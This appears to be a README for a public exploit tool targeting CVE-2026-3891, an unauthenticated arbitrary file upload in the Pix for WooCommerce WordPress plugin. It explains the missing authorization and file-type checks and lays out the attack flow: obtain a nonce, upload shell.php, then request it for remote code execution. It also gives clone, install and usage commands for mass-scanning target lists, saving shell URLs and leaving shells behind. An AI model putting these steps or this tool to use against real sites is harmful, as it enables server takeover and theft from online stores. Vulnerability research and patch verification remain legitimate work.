Share
## https://sploitus.com/exploit?id=2B4D35BF-EB2C-5844-B141-F9A46BA1B88E
CVE-2026-3891 โ€” Pix for WooCommerce Unauthenticated File Upload RCE
Nonce Leak โ†’ certificate_crt_path Upload โ†’ Code Execution

---

## Overview

**CVE-2026-3891** is a critical-severity (CVSS 9.8) **unauthenticated** arbitrary file upload vulnerability in the **Pix for WooCommerce** WordPress plugin (by linknacional) versions **โ‰ค 1.5.0**.

The `lkn_pix_for_woocommerce_c6_save_settings` AJAX handler has:
1. **No capability check** โ€” any unauthenticated visitor can call it
2. **No file type validation** โ€” any file extension is accepted via the `certificate_crt_path` parameter
3. A valid nonce is **freely obtainable** via the `lkn_pix_for_woocommerce_generate_nonce` endpoint without authentication

Uploaded files land in the web-accessible directory `/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/`.

### Affected Versions

| Version | Status |
|---|---|
| โ‰ค 1.5.0 | Vulnerable |
| 1.6.0+ | Patched |

> **Discovered by:** Alexis Lafontaine via Wordfence (March 13, 2026)

---

## Vulnerability Mechanism

### Root Cause

```php
// Nonce generated without auth
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', ...);

// Upload handler โ€” no capability check, no file type validation
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', ...);
function c6_save_settings() {
    // No current_user_can() check
    // No wp_check_filetype() call
    move_uploaded_file($_FILES['certificate_crt_path']['tmp_name'], $dest);
}
```

### Attack Flow

```
1. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_generate_nonce
   โ†’ Get valid nonce (no auth needed)
2. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_c6_save_settings
   โ†’ Upload shell.php via certificate_crt_path field
3. GET /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/shell.php
   โ†’ RCE
```

---

## Installation

```bash
git clone https://github.com/shinthink/CVE-2026-3891.git
cd CVE-2026-3891
pip install -r requirements.txt
```

## Usage

```bash
python cve_2026_3891.py -t target.com
python cve_2026_3891.py -f targets.txt -o shells.txt
python cve_2026_3891.py -t target.com --debug --no-cleanup
```

### Arguments

```
  -t, --target      Single target
  -f, --file        Target list
  -o, --output      Save RCE URLs
  --threads         Workers (default: 30)
  --no-cleanup      Leave shells on target
  --debug           Show every request
  -v, --verbose     Verbose output
```

---

## Disclaimer

> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
> The authors assume no liability for misuse.

---

## References

| Resource | Link |
|---|---|
| Wordfence Advisory | [wordfence.com](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/payment-gateway-pix-for-woocommerce/pix-for-woocommerce-150-unauthenticated-arbitrary-file-upload) |
| NVD Entry | [CVE-2026-3891](https://nvd.nist.gov/vuln/detail/CVE-2026-3891) |
| Researcher | Alexis Lafontaine |

---


  Not affiliated with linknacional or Pix for WooCommerce.